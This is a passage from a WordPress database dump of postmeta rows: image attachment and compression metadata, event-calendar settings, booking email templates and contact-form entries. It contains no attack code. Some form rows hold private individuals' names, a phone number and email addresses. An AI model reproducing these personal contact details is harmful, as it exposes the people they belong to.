WP-Optimize'),(173168,267532,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:254279;s:12:\"smushed-size\";i:254279;s:15:\"savings-percent\";d:0;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:254279;s:10:\"compressed\";i:254279;}s:6:\"medium\";a:2:{s:8:\"original\";i:11349;s:10:\"compressed\";i:11349;}s:5:\"large\";a:2:{s:8:\"original\";i:103083;s:10:\"compressed\";i:103083;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6158;s:10:\"compressed\";i:6158;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:60955;s:10:\"compressed\";i:60955;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:21522;s:10:\"compressed\";i:21522;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:36638;s:10:\"compressed\";i:36638;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:24882;s:10:\"compressed\";i:24882;}s:8:\"tileview\";a:2:{s:8:\"original\";i:26475;s:10:\"compressed\";i:26475;}}}'),(172987,267532,'_wp_attached_file','2022/11/winter-effects-10-J.jpg'),(172988,267532,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1530;s:6:\"height\";i:706;s:4:\"file\";s:31:\"2022/11/winter-effects-10-J.jpg\";s:8:\"filesize\";i:266745;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"winter-effects-10-J-300x138.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11349;}s:5:\"large\";a:5:{s:4:\"file\";s:32:\"winter-effects-10-J-1024x473.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105291;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"winter-effects-10-J-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6158;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"winter-effects-10-J-768x354.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62435;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:31:\"winter-effects-10-J-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21787;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:31:\"winter-effects-10-J-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37472;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:31:\"winter-effects-10-J-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25345;}s:8:\"tileview\";a:5:{s:4:\"file\";s:31:\"winter-effects-10-J-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26916;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(174190,267594,'_seq_num','4'),(172942,267520,'_field_101','Co Springs'),(172941,267520,'_field_100','(316) 806-2188'),(172940,267520,'_field_99','dogle007@yahoo.com'),(172939,267520,'_field_98','Ogletree'),(172938,267520,'_field_97','Dave'),(191451,269012,'_source_url','https://images.unsplash.com/photo-1458538977777-0549b2370168?ixlib=rb-0.3.5&q=80&fm=jpg&crop=entropy&cs=tinysrgb&w=1600&h=900&fit=crop&s=19bf20c1b7fea35185874310607373d2&.png'),(171485,267345,'mec_color',''),(171486,267345,'mec_location_id','122'),(171487,267345,'mec_dont_show_map','0'),(171488,267345,'mec_organizer_id','1'),(171489,267345,'mec_read_more',''),(171490,267345,'mec_more_info',''),(171491,267345,'mec_more_info_title',''),(171492,267345,'mec_more_info_target','_self'),(171493,267345,'mec_cost',''),(171494,267345,'mec_currency','a:0:{}'),(171495,267345,'mec_additional_organizer_ids','a:0:{}'),(171496,267345,'mec_additional_location_ids','a:0:{}'),(171497,267345,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-11-27\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-11-27\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(171498,267345,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(171499,267345,'mec_certain_weekdays','a:0:{}'),(171500,267345,'mec_allday','0'),(171501,267345,'one_occurrence','0'),(171502,267345,'mec_hide_time','0'),(171503,267345,'mec_hide_end_time','0'),(171504,267345,'mec_comment',''),(171505,267345,'mec_timezone','global'),(171506,267345,'mec_countdown_method','global'),(171507,267345,'mec_public','1'),(171508,267345,'mec_start_date','2022-11-27'),(171509,267345,'mec_start_time_hour','10'),(171510,267345,'mec_start_time_minutes','30'),(171511,267345,'mec_start_time_ampm','AM'),(171512,267345,'mec_start_day_seconds','37800'),(171513,267345,'mec_end_date','2022-11-27'),(171514,267345,'mec_end_time_hour','11'),(171515,267345,'mec_end_time_minutes','30'),(171516,267345,'mec_end_time_ampm','AM'),(171517,267345,'mec_end_day_seconds','41400'),(171518,267345,'mec_repeat_status','0'),(171519,267345,'mec_repeat_type',''),(171520,267345,'mec_repeat_interval','1'),(171521,267345,'mec_repeat_end',''),(171522,267345,'mec_repeat_end_at_occurrences',''),(171523,267345,'mec_repeat_end_at_date',''),(171524,267345,'mec_advanced_days','a:0:{}'),(171525,267345,'mec_in_days',''),(171526,267345,'mec_not_in_days',''),(171527,267345,'mec_hourly_schedules','a:0:{}'),(171528,267345,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(171529,267345,'mec_tickets','a:0:{}'),(171530,267345,'mec_fees_global_inheritance','1'),(171531,267345,'mec_fees','a:0:{}'),(171532,267345,'mec_ticket_variations_global_inheritance','1'),(171533,267345,'mec_ticket_variations','a:0:{}'),(171534,267345,'mec_reg_fields_global_inheritance','1'),(171535,267345,'mec_reg_fields','a:0:{}'),(171536,267345,'mec_bfixed_fields','a:0:{}'),(171537,267345,'mec_op','a:0:{}'),(171538,267345,'mec_fields','a:0:{}'),(171539,267345,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(171540,267345,'mec_event_status','EventScheduled'),(171541,267345,'mec_moved_online_link',''),(171542,267345,'mec_cancelled_reason',''),(171543,267345,'mec_display_cancellation_reason_in_single_page',''),(171544,267345,'protect_children',''),(171545,267345,'passster_activate_global_protection',NULL),(171546,267345,'passster_activate_protection',NULL),(171547,267345,'passster_protection_type','password'),(171548,267345,'boldgrid_hide_page_title','0'),(171549,267345,'_thumbnail_id','266839'),(171552,267345,'_dp_original','266311'),(171551,267345,'boldgrid_in_page_containers','1'),(171553,267345,'_edit_lock','1666394278:2'),(171554,267345,'_edit_last','2'),(171555,267346,'protect_children',''),(171556,267346,'mec_color',''),(171557,267346,'mec_location_id','118'),(171558,267346,'mec_dont_show_map','0'),(171559,267346,'mec_organizer_id','1'),(171560,267346,'mec_read_more',''),(171561,267346,'mec_more_info',''),(171562,267346,'mec_more_info_title',''),(171563,267346,'mec_more_info_target','_self'),(171564,267346,'mec_cost',''),(171565,267346,'mec_currency','a:0:{}'),(171566,267346,'mec_additional_organizer_ids','a:0:{}'),(171567,267346,'mec_additional_location_ids','a:0:{}'),(171568,267346,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-11-17\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-11-17\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(171569,267346,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(171570,267346,'mec_certain_weekdays','a:0:{}'),(171571,267346,'mec_allday','0'),(171572,267346,'one_occurrence','0'),(171573,267346,'mec_hide_time','0'),(171574,267346,'mec_hide_end_time','0'),(171575,267346,'mec_comment',''),(171576,267346,'mec_timezone','global'),(171577,267346,'mec_countdown_method','global'),(171578,267346,'mec_public','1'),(171579,267346,'mec_start_date','2022-11-17'),(171580,267346,'mec_start_time_hour','7'),(171581,267346,'mec_start_time_minutes','0'),(171582,267346,'mec_start_time_ampm','PM'),(171583,267346,'mec_start_day_seconds','68400'),(171584,267346,'mec_end_date','2022-11-17'),(171585,267346,'mec_end_time_hour','8'),(171586,267346,'mec_end_time_minutes','0'),(171587,267346,'mec_end_time_ampm','PM'),(171588,267346,'mec_end_day_seconds','72000'),(171589,267346,'mec_repeat_status','0'),(171590,267346,'mec_repeat_type',''),(171591,267346,'mec_repeat_interval','1'),(171592,267346,'mec_repeat_end',''),(171593,267346,'mec_repeat_end_at_occurrences',''),(171594,267346,'mec_repeat_end_at_date',''),(171595,267346,'mec_advanced_days','a:0:{}'),(171596,267346,'mec_in_days',''),(171597,267346,'mec_not_in_days',''),(171598,267346,'mec_hourly_schedules','a:0:{}'),(171599,267346,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(171600,267346,'mec_tickets','a:0:{}'),(171601,267346,'mec_fees_global_inheritance','1'),(171602,267346,'mec_fees','a:0:{}'),(171603,267346,'mec_ticket_variations_global_inheritance','1'),(171604,267346,'mec_ticket_variations','a:0:{}'),(171605,267346,'mec_reg_fields_global_inheritance','1'),(171606,267346,'mec_reg_fields','a:0:{}'),(171607,267346,'mec_bfixed_fields','a:0:{}'),(171608,267346,'mec_op','a:0:{}'),(171609,267346,'mec_fields','a:0:{}'),(171610,267346,'mec_event_status','EventScheduled'),(171611,267346,'mec_moved_online_link',''),(171612,267346,'mec_cancelled_reason',''),(171613,267346,'mec_display_cancellation_reason_in_single_page',''),(171614,267346,'boldgrid_hide_page_title','0'),(171615,267346,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(171616,267346,'passster_activate_global_protection',NULL),(171617,267346,'passster_activate_protection',NULL),(171618,267346,'passster_protection_type','password'),(171619,267346,'boldgrid_in_page_containers','1'),(171620,267346,'_thumbnail_id','266627'),(171622,267346,'_dp_original','267092'),(171623,267346,'_edit_lock','1666321936:2'),(171624,267346,'_edit_last','2'),(171627,267350,'_wp_attached_file','2022/10/harold-talk-OCT-2022-promo-2.jpg'),(171628,267350,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:780;s:6:\"height\";i:449;s:4:\"file\";s:40:\"2022/10/harold-talk-OCT-2022-promo-2.jpg\";s:8:\"filesize\";i:93747;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"harold-talk-OCT-2022-promo-2-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16254;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"harold-talk-OCT-2022-promo-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7413;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"harold-talk-OCT-2022-promo-2-768x442.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:442;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75175;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:40:\"harold-talk-OCT-2022-promo-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23337;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:40:\"harold-talk-OCT-2022-promo-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39752;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:40:\"harold-talk-OCT-2022-promo-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28564;}s:8:\"tileview\";a:5:{s:4:\"file\";s:40:\"harold-talk-OCT-2022-promo-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26131;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(171629,267350,'original-file','2022/10/harold-talk-OCT-2022-promo-2-updraft-pre-smush-original.jpg'),(171630,267350,'smush-complete','1'),(171631,267350,'smush-info','The file was compressed from 91.55 KB to 87.73 KB saving 4.17 percent using WP-Optimize'),(171632,267350,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:93747;s:12:\"smushed-size\";i:89840;s:15:\"savings-percent\";d:4.17;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:93747;s:10:\"compressed\";i:89840;}s:6:\"medium\";a:2:{s:8:\"original\";i:16254;s:10:\"compressed\";i:16149;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7413;s:10:\"compressed\";i:7413;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:75175;s:10:\"compressed\";i:73944;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:23337;s:10:\"compressed\";i:23186;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:39752;s:10:\"compressed\";i:39161;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:28564;s:10:\"compressed\";i:28086;}s:8:\"tileview\";a:2:{s:8:\"original\";i:26131;s:10:\"compressed\";i:25966;}}}'),(191531,269018,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(191530,269018,'mec_fields','a:0:{}'),(191529,269018,'mec_op','a:0:{}'),(191528,269018,'mec_bfixed_fields','a:0:{}'),(191527,269018,'mec_reg_fields','a:0:{}'),(191526,269018,'mec_reg_fields_global_inheritance','1'),(191525,269018,'mec_ticket_variations','a:0:{}'),(191524,269018,'mec_ticket_variations_global_inheritance','1'),(191523,269018,'mec_fees','a:0:{}'),(191521,269018,'mec_tickets','a:0:{}'),(191522,269018,'mec_fees_global_inheritance','1'),(171651,267353,'_edit_lock','1695008913:2'),(171652,267353,'_edit_last','2'),(171653,267354,'_field_133','Test'),(171654,267354,'_field_134','Testing'),(171655,267354,'_field_135','choll.03@comcast.net'),(171656,267354,'_field_137','This is a test'),(171657,267354,'_field_138','sadgadgdgdagsdg\nasgdadga\ndgfdga\nfdgsghghdfjjj'),(171658,267354,'_form_id','13'),(171659,267354,'_seq_num','120'),(176770,267895,'mec_in_days',''),(176771,267895,'mec_not_in_days',''),(176772,267895,'mec_hourly_schedules','a:0:{}'),(176743,267895,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sat.3\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:1:\"9\";}'),(176744,267895,'mec_certain_weekdays','a:0:{}'),(176745,267895,'mec_allday','0'),(176746,267895,'one_occurrence','0'),(176747,267895,'mec_hide_time','0'),(176748,267895,'mec_hide_end_time','0'),(176749,267895,'mec_comment',''),(176750,267895,'mec_timezone','global'),(176751,267895,'mec_countdown_method','global'),(176752,267895,'mec_public','1'),(176753,267895,'mec_start_date','2022-03-19'),(176754,267895,'mec_start_time_hour','10'),(176755,267895,'mec_start_time_minutes','30'),(176756,267895,'mec_start_time_ampm','AM'),(176757,267895,'mec_start_day_seconds','37800'),(176758,267895,'mec_end_date','2022-03-19'),(176759,267895,'mec_end_time_hour','12'),(176760,267895,'mec_end_time_minutes','30'),(176761,267895,'mec_end_time_ampm','PM'),(176762,267895,'mec_end_day_seconds','45000'),(176763,267895,'mec_repeat_status','1'),(176764,267895,'mec_repeat_type','advanced'),(176765,267895,'mec_repeat_interval','1'),(176766,267895,'mec_repeat_end','occurrences'),(176767,267895,'mec_repeat_end_at_occurrences','8'),(176768,267895,'mec_repeat_end_at_date',''),(176769,267895,'mec_advanced_days','a:1:{i:0;s:5:\"Sat.3\";}'),(176742,267895,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-19\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-19\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sat.3\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:1:\"9\";}}'),(176740,267895,'mec_additional_organizer_ids','a:0:{}'),(176741,267895,'mec_additional_location_ids','a:0:{}'),(176729,267895,'protect_children',''),(176730,267895,'mec_color',''),(176731,267895,'mec_location_id','118'),(176732,267895,'mec_dont_show_map','0'),(176733,267895,'mec_organizer_id','1'),(176734,267895,'mec_read_more',''),(176735,267895,'mec_more_info',''),(176736,267895,'mec_more_info_title',''),(176737,267895,'mec_more_info_target','_self'),(176738,267895,'mec_cost',''),(176739,267895,'mec_currency','a:0:{}'),(171667,267356,'_wp_attached_file','2022/10/info-security-1.jpg'),(171668,267356,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:685;s:6:\"height\";i:336;s:4:\"file\";s:27:\"2022/10/info-security-1.jpg\";s:8:\"filesize\";i:81406;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"info-security-1-300x147.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14970;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"info-security-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8444;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"info-security-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28672;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"info-security-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47045;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"info-security-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31857;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"info-security-1-300x336.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37290;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(171669,267353,'boldgrid_hide_page_title','0'),(171670,267353,'boldgrid_in_page_containers','1'),(171671,267356,'original-file','2022/10/info-security-1-updraft-pre-smush-original.jpg'),(171672,267356,'smush-complete','1'),(171673,267356,'smush-info','The file was compressed from 79.50 KB to 76.12 KB saving 4.25 percent using WP-Optimize'),(171674,267356,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:81406;s:12:\"smushed-size\";i:77945;s:15:\"savings-percent\";d:4.25;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:81406;s:10:\"compressed\";i:77945;}s:6:\"medium\";a:2:{s:8:\"original\";i:14970;s:10:\"compressed\";i:14764;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8444;s:10:\"compressed\";i:8378;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:28672;s:10:\"compressed\";i:28258;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:47045;s:10:\"compressed\";i:46240;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:31857;s:10:\"compressed\";i:31335;}s:8:\"tileview\";a:2:{s:8:\"original\";i:37290;s:10:\"compressed\";i:36620;}}}'),(171675,267368,'_wp_attached_file','2022/10/info-security-2.jpg'),(171676,267368,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:684;s:6:\"height\";i:451;s:4:\"file\";s:27:\"2022/10/info-security-2.jpg\";s:8:\"filesize\";i:92741;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"info-security-2-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16618;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"info-security-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7363;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"info-security-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24762;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"info-security-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39732;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"info-security-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26916;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"info-security-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32005;}}s: